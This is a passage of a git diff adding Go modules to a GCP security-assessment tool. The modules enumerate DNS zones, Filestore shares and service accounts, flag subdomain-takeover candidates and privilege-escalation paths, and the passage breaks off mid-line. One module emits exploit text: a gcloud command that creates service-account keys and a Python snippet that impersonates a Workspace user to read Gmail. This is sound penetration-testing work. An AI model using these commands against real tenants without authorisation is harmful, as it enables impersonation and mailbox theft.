"MEDIUM", "CloudFront distribution may be unconfigured"}, + // Azure + ".azurewebsites.net": {"Azure App Service", "HIGH", "Azure web app may be deleted"}, + ".cloudapp.azure.com": {"Azure Cloud App", "HIGH", "Azure cloud app may be deleted"}, + ".cloudapp.net": {"Azure Cloud Service", "HIGH", "Azure cloud service may be deleted"}, + ".blob.core.windows.net": {"Azure Blob Storage", "HIGH", "Azure blob container may be deleted"}, + ".azure-api.net": {"Azure API Management", "MEDIUM", "Azure API may be deleted"}, + ".azureedge.net": {"Azure CDN", "MEDIUM", "Azure CDN endpoint may be deleted"}, + ".trafficmanager.net": {"Azure Traffic Manager", "HIGH", "Traffic Manager profile may be deleted"}, + // Google Cloud + ".storage.googleapis.com": {"GCP Cloud Storage", "HIGH", "GCS bucket may be deleted"}, + ".appspot.com": {"GCP App Engine", "MEDIUM", "App Engine app may be deleted"}, + ".run.app": {"GCP Cloud Run", "LOW", "Cloud Run service (usually protected)"}, + ".cloudfunctions.net": {"GCP Cloud Functions", "LOW", "Cloud Function (usually protected)"}, + // GitHub + ".github.io": {"GitHub Pages", "HIGH", "GitHub Pages repo may be deleted"}, + ".githubusercontent.com": {"GitHub", "MEDIUM", "GitHub resource may be deleted"}, + // Heroku + ".herokuapp.com": {"Heroku", "HIGH", "Heroku app may be deleted"}, + ".herokudns.com": {"Heroku DNS", "HIGH", "Heroku DNS may be unconfigured"}, + // Other services + ".pantheonsite.io": {"Pantheon", "HIGH", "Pantheon site may be deleted"}, + ".netlify.app": {"Netlify", "MEDIUM", "Netlify site may be deleted"}, + ".netlify.com": {"Netlify", "MEDIUM", "Netlify site may be deleted"}, + ".vercel.app": {"Vercel", "MEDIUM", "Vercel deployment may be deleted"}, + ".now.sh": {"Vercel (Now)", "MEDIUM", "Vercel deployment may be deleted"}, + ".surge.sh": {"Surge.sh", "HIGH", "Surge project may be deleted"}, + ".bitbucket.io": {"Bitbucket", "HIGH", "Bitbucket repo may be deleted"}, + ".ghost.io": {"Ghost", "HIGH", "Ghost blog may be deleted"}, + ".helpjuice.com": {"Helpjuice", "HIGH", "Helpjuice site may be deleted"}, + ".helpscoutdocs.com": {"HelpScout", "HIGH", "HelpScout docs may be deleted"}, + ".zendesk.com": {"Zendesk", "MEDIUM", "Zendesk may be unconfigured"}, + ".teamwork.com": {"Teamwork", "HIGH", "Teamwork site may be deleted"}, + ".cargocollective.com": {"Cargo", "HIGH", "Cargo site may be deleted"}, + ".feedpress.me": {"Feedpress", "HIGH", "Feedpress feed may be deleted"}, + ".freshdesk.com": {"Freshdesk", "MEDIUM", "Freshdesk may be unconfigured"}, + ".readme.io": {"ReadMe", "HIGH", "ReadMe docs may be deleted"}, + ".statuspage.io": {"Statuspage", "HIGH", "Statuspage may be deleted"}, + ".smugmug.com": {"SmugMug", "HIGH", "SmugMug may be deleted"}, + ".strikingly.com": {"Strikingly", "HIGH", "Strikingly site may be deleted"}, + ".tilda.ws": {"Tilda", "HIGH", "Tilda site may be deleted"}, + ".tumblr.com": {"Tumblr", "HIGH", "Tumblr blog may be deleted"}, + ".unbounce.com": {"Unbounce", "HIGH", "Unbounce page may be deleted"}, + ".webflow.io": {"Webflow", "HIGH", "Webflow site may be deleted"}, + ".wordpress.com": {"WordPress.com", "MEDIUM", "WordPress site may be deleted"}, + ".wpengine.com": {"WP Engine", "HIGH", "WP Engine site may be deleted"}, + ".desk.com": {"Desk.com", "HIGH", "Desk.com may be deleted"}, + ".myshopify.com": {"Shopify", "HIGH", "Shopify store may be deleted"}, + ".launchrock.com": {"LaunchRock", "HIGH", "LaunchRock page may be deleted"}, + ".pingdom.com": {"Pingdom", "MEDIUM", "Pingdom may be unconfigured"}, + ".tictail.com": {"Tictail", "HIGH", "Tictail store may be deleted"}, + ".campaignmonitor.com": {"Campaign Monitor", "HIGH", "Campaign Monitor may be deleted"}, + ".canny.io": {"Canny", "HIGH", "Canny may be deleted"}, + ".getresponse.com": {"GetResponse", "HIGH", "GetResponse may be deleted"}, + ".airee.ru": {"Airee", "HIGH", "Airee may be deleted"}, + ".thinkific.com": {"Thinkific", "HIGH", "Thinkific may be deleted"}, + ".agilecrm.com": {"Agile CRM", "HIGH", "Agile CRM may be deleted"}, + ".aha.io": {"Aha!", "HIGH", "Aha! may be deleted"}, + ".animaapp.io": {"Anima", "HIGH", "Anima may be deleted"}, + ".proposify.com": {"Proposify", "HIGH", "Proposify may be deleted"}, +} + +// getService returns a DNS service client using cached session if available +func (ds *DNSService) getService(ctx context.Context) (*dns.Service, error) { + if ds.session != nil { + return sdk.CachedGetDNSService(ctx, ds.session) + } + return dns.NewService(ctx) +} + +// Zones retrieves all DNS managed zones in a project +func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { + ctx := context.Background() + + service, err := ds.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + var zones []ZoneInfo + + call := service.ManagedZones.List(projectID) + err = call.Pages(ctx, func(page *dns.ManagedZonesListResponse) error { + for _, zone := range page.ManagedZones { + info := parseZoneInfo(zone, projectID) + // Get IAM bindings for the zone + info.IAMBindings = ds.getZoneIAMBindings(service, ctx, projectID, zone.Name) + zones = append(zones, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + return zones, nil +} + +// Records retrieves all DNS records in a zone +func (ds *DNSService) Records(projectID, zoneName string) ([]RecordInfo, error) { + ctx := context.Background() + + service, err := ds.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + var records []RecordInfo + + call := service.ResourceRecordSets.List(projectID, zoneName) + err = call.Pages(ctx, func(page *dns.ResourceRecordSetsListResponse) error { + for _, rrset := range page.Rrsets { + info := RecordInfo{ + Name: rrset.Name, + ProjectID: projectID, + ZoneName: zoneName, + Type: rrset.Type, + TTL: rrset.Ttl, + RRDatas: rrset.Rrdatas, + } + records = append(records, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + return records, nil +} + +// parseZoneInfo extracts relevant information from a DNS managed zone +func parseZoneInfo(zone *dns.ManagedZone, projectID string) ZoneInfo { + info := ZoneInfo{ + Name: zone.Name, + ProjectID: projectID, + DNSName: zone.DnsName, + Description: zone.Description, + Visibility: zone.Visibility, + CreationTime: zone.CreationTime, + } + + // DNSSEC configuration + if zone.DnssecConfig != nil { + info.DNSSECState = zone.DnssecConfig.State + if len(zone.DnssecConfig.DefaultKeySpecs) > 0 { + info.DNSSECKeyType = zone.DnssecConfig.DefaultKeySpecs[0].Algorithm + } + } + + // Private zone configuration + if zone.PrivateVisibilityConfig != nil { + for _, network := range zone.PrivateVisibilityConfig.Networks { + info.PrivateNetworks = append(info.PrivateNetworks, extractNetworkName(network.NetworkUrl)) + } + } + + // Peering configuration + if zone.PeeringConfig != nil && zone.PeeringConfig.TargetNetwork != nil { + info.PeeringNetwork = extractNetworkName(zone.PeeringConfig.TargetNetwork.NetworkUrl) + // Extract project from network URL + if strings.Contains(zone.PeeringConfig.TargetNetwork.NetworkUrl, "/projects/") { + parts := strings.Split(zone.PeeringConfig.TargetNetwork.NetworkUrl, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + info.PeeringTargetProject = parts[i+1] + break + } + } + } + } + + // Forwarding configuration + if zone.ForwardingConfig != nil { + for _, target := range zone.ForwardingConfig.TargetNameServers { + info.ForwardingTargets = append(info.ForwardingTargets, target.Ipv4Address) + } + } + + return info +} + +// extractNetworkName extracts the network name from a network URL +func extractNetworkName(networkURL string) string { + // Format: https://www.googleapis.com/compute/v1/projects/PROJECT/global/networks/NETWORK + parts := strings.Split(networkURL, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return networkURL +} + +// CheckTakeoverRisks analyzes DNS records for potential subdomain takeover vulnerabilities +func (ds *DNSService) CheckTakeoverRisks(records []RecordInfo) []TakeoverRisk { + var risks []TakeoverRisk + + for _, record := range records { + // Only check CNAME records (primary takeover vector) + if record.Type != "CNAME" { + continue + } + + for _, target := range record.RRDatas { + targetLower := strings.ToLower(target) + + // Check against known vulnerable patterns + for pattern, info := range takeoverPatterns { + if strings.Contains(targetLower, pattern) { + risk := TakeoverRisk{ + RecordName: record.Name, + RecordType: record.Type, + Target: target, + Service: info.Service, + RiskLevel: info.RiskLevel, + Description: info.Description, + Verification: generateVerificationCommand(record.Name, target, info.Service), + } + risks = append(risks, risk) + break // Only match first pattern + } + } + } + } + + return risks +} + +// generateVerificationCommand creates a command to verify if takeover is possible +func generateVerificationCommand(recordName, target, service string) string { + // Remove trailing dot from DNS names + name := strings.TrimSuffix(recordName, ".") + + switch { + case strings.Contains(service, "S3"): + return fmt.Sprintf("curl -sI http://%s | head -5 # Look for 'NoSuchBucket'", name) + case strings.Contains(service, "Azure"): + return fmt.Sprintf("curl -sI https://%s | head -5 # Look for 'NXDOMAIN' or error page", name) + case strings.Contains(service, "GitHub"): + return fmt.Sprintf("curl -sI https://%s | head -5 # Look for '404' or 'no GitHub Pages'", name) + case strings.Contains(service, "Heroku"): + return fmt.Sprintf("curl -sI https://%s | head -5 # Look for 'no such app'", name) + default: + return fmt.Sprintf("dig %s && curl -sI https://%s | head -5", name, name) + } +} + +// getZoneIAMBindings retrieves IAM bindings for a DNS managed zone +func (ds *DNSService) getZoneIAMBindings(service *dns.Service, ctx context.Context, projectID, zoneName string) []IAMBinding { + var bindings []IAMBinding + + resource := "projects/" + projectID + "/managedZones/" + zoneName + policy, err := service.ManagedZones.GetIamPolicy(resource, &dns.GoogleIamV1GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} diff --git a/gcp/services/domainWideDelegationService/domainWideDelegationService.go b/gcp/services/domainWideDelegationService/domainWideDelegationService.go new file mode 100644 index 00000000..922a1381 --- /dev/null +++ b/gcp/services/domainWideDelegationService/domainWideDelegationService.go @@ -0,0 +1,264 @@ +package domainwidedelegationservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + iam "google.golang.org/api/iam/v1" +) + +type DomainWideDelegationService struct{ + session *gcpinternal.SafeSession +} + +func New() *DomainWideDelegationService { + return &DomainWideDelegationService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DomainWideDelegationService { + return &DomainWideDelegationService{ + session: session, + } +} + +// DWDServiceAccount represents a service account with domain-wide delegation +type DWDServiceAccount struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + OAuth2ClientID string `json:"oauth2ClientId"` + DWDEnabled bool `json:"dwdEnabled"` + Keys []KeyInfo `json:"keys"` + Description string `json:"description"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + WorkspaceScopes []string `json:"workspaceScopes"` // Common Workspace scopes to try +} + +// KeyInfo represents a service account key +type KeyInfo struct { + KeyID string `json:"keyId"` + CreatedAt string `json:"createdAt"` + ExpiresAt string `json:"expiresAt"` + KeyAlgorithm string `json:"keyAlgorithm"` + KeyType string `json:"keyType"` +} + +// Common Google Workspace OAuth scopes that DWD service accounts might have +var CommonWorkspaceScopes = []string{ + "https://www.googleapis.com/auth/gmail.readonly", + "https://www.googleapis.com/auth/gmail.send", + "https://www.googleapis.com/auth/gmail.modify", + "https://www.googleapis.com/auth/drive", + "https://www.googleapis.com/auth/drive.readonly", + "https://www.googleapis.com/auth/calendar", + "https://www.googleapis.com/auth/calendar.readonly", + "https://www.googleapis.com/auth/admin.directory.user.readonly", + "https://www.googleapis.com/auth/admin.directory.group.readonly", + "https://www.googleapis.com/auth/spreadsheets", + "https://www.googleapis.com/auth/contacts.readonly", + "https://mail.google.com/", +} + +// getIAMService returns an IAM service client using cached session if available +func (s *DomainWideDelegationService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// GetDWDServiceAccounts finds service accounts that may have domain-wide delegation +func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([]DWDServiceAccount, error) { + ctx := context.Background() + service, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var dwdAccounts []DWDServiceAccount + + // List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.ServiceAccounts.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + for _, sa := range resp.Accounts { + // Check if the service account has an OAuth2 client ID (required for DWD) + // The OAuth2ClientId field is populated when DWD is enabled + dwdEnabled := sa.Oauth2ClientId != "" + + account := DWDServiceAccount{ + Email: sa.Email, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + OAuth2ClientID: sa.Oauth2ClientId, + DWDEnabled: dwdEnabled, + Description: sa.Description, + Keys: []KeyInfo{}, + RiskReasons: []string{}, + ExploitCommands: []string{}, + WorkspaceScopes: CommonWorkspaceScopes, + } + + // Check for keys + keysResp, err := service.Projects.ServiceAccounts.Keys.List( + fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email), + ).Context(ctx).Do() + if err == nil { + // Collect user-managed keys (not system-managed) + for _, key := range keysResp.Keys { + if key.KeyType == "USER_MANAGED" { + // Extract key ID from full name (projects/.../keys/KEY_ID) + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + account.Keys = append(account.Keys, KeyInfo{ + KeyID: keyID, + CreatedAt: key.ValidAfterTime, + ExpiresAt: key.ValidBeforeTime, + KeyAlgorithm: key.KeyAlgorithm, + KeyType: key.KeyType, + }) + } + } + } + + // Analyze risk + account.RiskLevel, account.RiskReasons = s.analyzeRisk(account) + + // Generate exploit commands + account.ExploitCommands = s.generateExploitCommands(account) + + // Only include accounts with DWD or that look like they might be used for it + if dwdEnabled || s.looksLikeDWDAccount(account) { + dwdAccounts = append(dwdAccounts, account) + } + } + + return dwdAccounts, nil +} + +// looksLikeDWDAccount checks if a service account might be used for DWD based on naming +func (s *DomainWideDelegationService) looksLikeDWDAccount(account DWDServiceAccount) bool { + emailLower := strings.ToLower(account.Email) + descLower := strings.ToLower(account.Description) + nameLower := strings.ToLower(account.DisplayName) + + // Common naming patterns for DWD service accounts + dwdPatterns := []string{ + "delegation", "dwd", "workspace", "gsuite", "admin", + "gmail", "drive", "calendar", "directory", "impersonat", + } + + for _, pattern := range dwdPatterns { + if strings.Contains(emailLower, pattern) || + strings.Contains(descLower, pattern) || + strings.Contains(nameLower, pattern) { + return true + } + } + + return false +} + +func (s *DomainWideDelegationService) analyzeRisk(account DWDServiceAccount) (string, []string) { + var reasons []string + score := 0 + + if account.DWDEnabled { + reasons = append(reasons, "Domain-wide delegation ENABLED (OAuth2 Client ID present)") + score += 3 + } + + hasKeys := len(account.Keys) > 0 + if hasKeys { + reasons = append(reasons, fmt.Sprintf("Has %d user-managed key(s) - can be used for impersonation", len(account.Keys))) + score += 2 + } + + if account.DWDEnabled && hasKeys { + reasons = append(reasons, "CRITICAL: DWD enabled + keys exist = can impersonate any Workspace user!") + score += 2 + } + + // Check for suspicious naming + if s.looksLikeDWDAccount(account) && !account.DWDEnabled { + reasons = append(reasons, "Name suggests DWD purpose but OAuth2 Client ID not detected") + score += 1 + } + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *DomainWideDelegationService) generateExploitCommands(account DWDServiceAccount) []string { + var commands []string + + if !account.DWDEnabled { + commands = append(commands, + "# DWD not confirmed - OAuth2 Client ID not present", + "# Check Google Admin Console: Security > API Controls > Domain-wide Delegation", + ) + return commands + } + + commands = append(commands, + fmt.Sprintf("# Domain-Wide Delegation Service Account: %s", account.Email), + fmt.Sprintf("# OAuth2 Client ID: %s", account.OAuth2ClientID), + "", + "# To exploit DWD, you need:", + "# 1. A key file for this service account", + "# 2. The email of a Workspace user to impersonate", + "# 3. Knowledge of which scopes are authorized in Admin Console", + "", + ) + + if len(account.Keys) > 0 { + commands = append(commands, + "# Create a new key (if you have iam.serviceAccountKeys.create permission):", + fmt.Sprintf("gcloud iam service-accounts keys create /tmp/key.json --iam-account=%s", account.Email), + "", + ) + } + + commands = append(commands, + "# Python exploit example:", + "# from google.oauth2 import service_account", + "# from googleapiclient.discovery import build", + "#", + "# creds = service_account.Credentials.from_service_account_file(", + "# 'key.json',", + fmt.Sprintf("# scopes=['https://www.googleapis.com/auth/gmail.readonly'],"), + "# subject='admin@yourdomain.com' # User to impersonate", + "# )", + "#", + "# gmail = build('gmail', 'v1', credentials=creds)", + "# messages = gmail.users().messages().list(userId='me').execute()", + "", + "# Common scopes to test (must be authorized in Admin Console):", + ) + + for _, scope := range CommonWorkspaceScopes[:5] { // First 5 most useful scopes + commands = append(commands, fmt.Sprintf("# - %s", scope)) + } + + return commands +} diff --git a/gcp/services/filestoreService/filestoreService.go b/gcp/services/filestoreService/filestoreService.go new file mode 100644 index 00000000..1ed75c42 --- /dev/null +++ b/gcp/services/filestoreService/filestoreService.go @@ -0,0 +1,136 @@ +package filestoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + file "google.golang.org/api/file/v1" +) + +type FilestoreService struct { + session *gcpinternal.SafeSession +} + +func New() *FilestoreService { + return &FilestoreService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *FilestoreService { + return &FilestoreService{ + session: session, + } +} + +type FilestoreInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Tier string `json:"tier"` + State string `json:"state"` + Network string `json:"network"` + IPAddresses []string `json:"ipAddresses"` + Shares []ShareInfo `json:"shares"` + CreateTime string `json:"createTime"` + Protocol string `json:"protocol"` // NFS_V3, NFS_V4_1 +} + +type ShareInfo struct { + Name string `json:"name"` + CapacityGB int64 `json:"capacityGb"` + NfsExportOptions []NfsExportOption `json:"nfsExportOptions"` +} + +type NfsExportOption struct { + IPRanges []string `json:"ipRanges"` + AccessMode string `json:"accessMode"` // READ_ONLY, READ_WRITE + SquashMode string `json:"squashMode"` // NO_ROOT_SQUASH, ROOT_SQUASH + AnonUID int64 `json:"anonUid"` + AnonGID int64 `json:"anonGid"` +} + +// getService returns a Filestore service client using cached session if available +func (s *FilestoreService) getService(ctx context.Context) (*file.Service, error) { + if s.session != nil { + return sdk.CachedGetFilestoreService(ctx, s.session) + } + return file.NewService(ctx) +} + +func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceInfo, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") + } + + var instances []FilestoreInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *file.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := FilestoreInstanceInfo{ + Name: extractResourceName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + Tier: instance.Tier, + State: instance.State, + CreateTime: instance.CreateTime, + Protocol: instance.Protocol, // NFS_V3, NFS_V4_1 + } + + if len(instance.Networks) > 0 { + info.Network = instance.Networks[0].Network + info.IPAddresses = instance.Networks[0].IpAddresses + } + + for _, share := range instance.FileShares { + shareInfo := ShareInfo{ + Name: share.Name, + CapacityGB: share.CapacityGb, + } + + // Parse NFS export options + for _, opt := range share.NfsExportOptions { + exportOpt := NfsExportOption{ + IPRanges: opt.IpRanges, + AccessMode: opt.AccessMode, + SquashMode: opt.SquashMode, + AnonUID: opt.AnonUid, + AnonGID: opt.AnonGid, + } + shareInfo.NfsExportOptions = append(shareInfo.NfsExportOptions, exportOpt) + } + + info.Shares = append(info.Shares, shareInfo) + } + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") + } + return instances, nil +} + +func extractResourceName(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} + +func extractLocation(name string) string { + parts := strings.Split(name, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/foxmapperService/foxmapperService.go b/gcp/services/foxmapperService/foxmapperService.go new file mode 100755 index 00000000..cbc0f97a --- /dev/null +++ b/gcp/services/foxmapperService/foxmapperService.go @@ -0,0 +1,1861 @@ +package foxmapperService + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "runtime" + "sort" + "strings" + + "github.com/dominikbraun/graph" +) + +// Node represents a GCP IAM principal from FoxMapper graph +type Node struct { + MemberID string `json:"member_id"` + MemberType string `json:"member_type"` + Email string `json:"email"` + DisplayName string `json:"display_name"` + ProjectID string `json:"project_id"` + UniqueID string `json:"unique_id"` + IAMBindings []map[string]any `json:"iam_bindings"` + IsAdmin bool `json:"is_admin"` + AdminLevel string `json:"admin_level"` // org, folder, project + IsDisabled bool `json:"is_disabled"` + HasKeys bool `json:"has_keys"` + KeyCount int `json:"key_count"` + Tags map[string]string `json:"tags"` + Description string `json:"description"` + OAuth2ClientID string `json:"oauth2_client_id"` + AttachedResources []map[string]any `json:"attached_resources"` + WorkloadIdentityBindings []map[string]any `json:"workload_identity_bindings"` + GroupMemberships []string `json:"group_memberships"` + Domain string `json:"domain"` + // Computed fields + PathToAdmin bool + CanPrivEscToAdminString string + IsAdminString string +} + +// FlexibleBool handles JSON that may be bool, array, or other types +// Used for scope_limited which may vary between FoxMapper versions +type FlexibleBool bool + +func (fb *FlexibleBool) UnmarshalJSON(data []byte) error { + // Try bool first + var b bool + if err := json.Unmarshal(data, &b); err == nil { + *fb = FlexibleBool(b) + return nil + } + + // Try array (non-empty array = true) + var arr []interface{} + if err := json.Unmarshal(data, &arr); err == nil { + *fb = FlexibleBool(len(arr) > 0) + return nil + } + + // Try string ("true"/"false") + var s string + if err := json.Unmarshal(data, &s); err == nil { + *fb = FlexibleBool(s == "true" || s == "True" || s == "1") + return nil + } + + // Default to false + *fb = false + return nil +} + +// Edge represents a privilege escalation edge from FoxMapper graph +type Edge struct { + Source string `json:"source"` + Destination string `json:"destination"` + Reason string `json:"reason"` + ShortReason string `json:"short_reason"` + EdgeType string `json:"edge_type"` + Resource string `json:"resource"` + Confidence string `json:"confidence,omitempty"` // high (default/empty), medium, low + Conditions map[string]any `json:"conditions"` + ScopeLimited FlexibleBool `json:"scope_limited"` + ScopeWarning string `json:"scope_warning"` + ScopeBlocksEscalation FlexibleBool `json:"scope_blocks_escalation"` + ScopeAllowsMethods []string `json:"scope_allows_methods"` + Scopes []string `json:"scopes"` +} + +// EffectiveConfidence returns the edge's confidence, defaulting to "high" if empty +func (e Edge) EffectiveConfidence() string { + if e.Confidence == "" { + return "high" + } + return e.Confidence +} + +// WorstConfidence returns the worse of two confidence levels (low < medium < high) +func WorstConfidence(a, b string) string { + order := map[string]int{"low": 0, "medium": 1, "high": 2} + if a == "" { + a = "high" + } + if b == "" { + b = "high" + } + if order[a] <= order[b] { + return a + } + return b +} + +// Policy represents an IAM policy from FoxMapper graph +type Policy struct { + Resource string `json:"resource"` + Bindings []PolicyBinding `json:"bindings"` + Version int `json:"version"` +} + +// PolicyBinding represents a single IAM binding +type PolicyBinding struct { + Role string `json:"role"` + Members []string `json:"members"` + Condition map[string]any `json:"condition"` +} + +// GraphMetadata contains metadata about the FoxMapper graph +type GraphMetadata struct { + ProjectID string `json:"project_id"` + OrgID string `json:"org_id"` + CreatedAt string `json:"created_at"` + FoxMapperVersion string `json:"foxmapper_version"` +} + +// PrivescPath represents a privilege escalation path +type PrivescPath struct { + Source string + Destination string + Edges []Edge + HopCount int + AdminLevel string // org, folder, project + ScopeBlocked bool + Confidence string // worst confidence across all edges in path (high, medium, low) +} + +// FoxMapperService provides access to FoxMapper graph data +type FoxMapperService struct { + DataBasePath string + Nodes []Node + Edges []Edge + Policies []Policy + Metadata GraphMetadata + nodeMap map[string]*Node + graph graph.Graph[string, string] + initialized bool + + // Pre-computed findings from FoxMapper presets + LateralFindingsData *LateralFindingsFile // From lateral_findings.json + DataExfilFindingsData *DataExfilFindingsFile // From data_exfil_findings.json +} + +// LateralFindingsFile represents the wrapper for lateral_findings.json +type LateralFindingsFile struct { + ProjectID string `json:"project_id"` + TotalTechniquesAnalyzed int `json:"total_techniques_analyzed"` + TechniquesWithAccess int `json:"techniques_with_access"` + CategoriesSummary map[string]CategorySummary `json:"categories_summary"` + Findings []LateralFindingEntry `json:"findings"` +} + +// DataExfilFindingsFile represents the wrapper for data_exfil_findings.json +type DataExfilFindingsFile struct { + ProjectID string `json:"project_id"` + TotalTechniquesAnalyzed int `json:"total_techniques_analyzed"` + TechniquesWithAccess int `json:"techniques_with_access"` + PublicResources []string `json:"public_resources"` + ServicesSummary map[string]ServiceSummary `json:"services_summary"` + Findings []DataExfilFindingEntry `json:"findings"` +} + +// CategorySummary provides summary info for a lateral movement category +type CategorySummary struct { + Count int `json:"count"` + Description string `json:"description"` +} + +// ServiceSummary provides summary info for a data exfil service +type ServiceSummary struct { + Count int `json:"count"` + TotalPrincipals int `json:"total_principals"` + NonAdminPrincipals int `json:"non_admin_principals"` + ViaPrivesc int `json:"via_privesc"` + ResourceLevel int `json:"resource_level"` +} + +// LateralFindingEntry represents a single lateral movement finding +type LateralFindingEntry struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Category string `json:"category"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + PrincipalCount int `json:"principal_count"` + NonAdminCount int `json:"non_admin_count"` + ViaEdgeCount int `json:"via_edge_count"` + Principals []PrincipalAccessFile `json:"principals"` +} + +// DataExfilFindingEntry represents a single data exfil finding +type DataExfilFindingEntry struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Service string `json:"service"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + PrincipalCount int `json:"principal_count"` + NonAdminCount int `json:"non_admin_count"` + ViaEdgeCount int `json:"via_edge_count"` + Principals []PrincipalAccessFile `json:"principals"` +} + +// PrincipalAccessFile represents a principal with access from FoxMapper findings +type PrincipalAccessFile struct { + Principal string `json:"principal"` + MemberID string `json:"member_id"` + MemberType string `json:"member_type"` + IsAdmin bool `json:"is_admin"` + IsServiceAccount bool `json:"is_service_account"` + AccessType string `json:"access_type"` // direct, via_privesc + ViaEdge bool `json:"via_edge"` + EdgePath []string `json:"edge_path,omitempty"` + Resource string `json:"resource,omitempty"` + // Scope information (may be in JSON or derived from Resource) + ScopeType string `json:"scope_type,omitempty"` + ScopeID string `json:"scope_id,omitempty"` + ScopeName string `json:"scope_name,omitempty"` +} + +// New creates a new FoxMapperService +func New() *FoxMapperService { + return &FoxMapperService{ + nodeMap: make(map[string]*Node), + } +} + +// generateFoxMapperDataBasePaths returns paths to check for FoxMapper data +// FoxMapper saves data with prefixes: org-{id}, proj-{id}, folder-{id} +func generateFoxMapperDataBasePaths(identifier string, isOrg bool) []string { + var paths []string + homeDir, err := os.UserHomeDir() + if err != nil { + return paths + } + + // Determine the prefixed identifier FoxMapper uses + // FoxMapper saves as: org-{id}, proj-{id}, folder-{id} + var prefixedIdentifiers []string + if isOrg { + prefixedIdentifiers = append(prefixedIdentifiers, "org-"+identifier) + } else { + prefixedIdentifiers = append(prefixedIdentifiers, "proj-"+identifier) + } + // Also try without prefix for backwards compatibility + prefixedIdentifiers = append(prefixedIdentifiers, identifier) + + gcpDir := "gcp" + + // Generate paths for each possible identifier format + for _, prefixedID := range prefixedIdentifiers { + // Platform-specific paths + if runtime.GOOS == "darwin" { + // macOS: ~/Library/Application Support/foxmapper/gcp/{id} + paths = append(paths, filepath.Join(homeDir, "Library", "Application Support", "foxmapper", gcpDir, prefixedID)) + } else if runtime.GOOS == "windows" { + // Windows: %APPDATA%/foxmapper/gcp/{id} + appData := os.Getenv("APPDATA") + if appData != "" { + paths = append(paths, filepath.Join(appData, "foxmapper", gcpDir, prefixedID)) + } + } + + // Linux/BSD and fallback for all platforms + // Check XDG_DATA_HOME first + xdgDataHome := os.Getenv("XDG_DATA_HOME") + if xdgDataHome != "" { + paths = append(paths, filepath.Join(xdgDataHome, "foxmapper", gcpDir, prefixedID)) + } + + // Default: ~/.local/share/foxmapper/gcp/{id} + paths = append(paths, filepath.Join(homeDir, ".local", "share", "foxmapper", gcpDir, prefixedID)) + } + + // Legacy pmapper paths (for backwards compatibility) - without prefix + if runtime.GOOS == "darwin" { + paths = append(paths, filepath.Join(homeDir, "Library", "Application Support", "com.nccgroup.principalmapper", identifier)) + } else { + xdgDataHome := os.Getenv("XDG_DATA_HOME") + if xdgDataHome != "" { + paths = append(paths, filepath.Join(xdgDataHome, "principalmapper", identifier)) + } + paths = append(paths, filepath.Join(homeDir, ".local", "share", "principalmapper", identifier)) + } + + return paths +} + +// LoadGraph loads FoxMapper graph data for an org or project +func (s *FoxMapperService) LoadGraph(identifier string, isOrg bool) error { + // Try to find FoxMapper data + var graphPath string + paths := generateFoxMapperDataBasePaths(identifier, isOrg) + + for _, path := range paths { + graphDir := filepath.Join(path, "graph") + nodesPath := filepath.Join(graphDir, 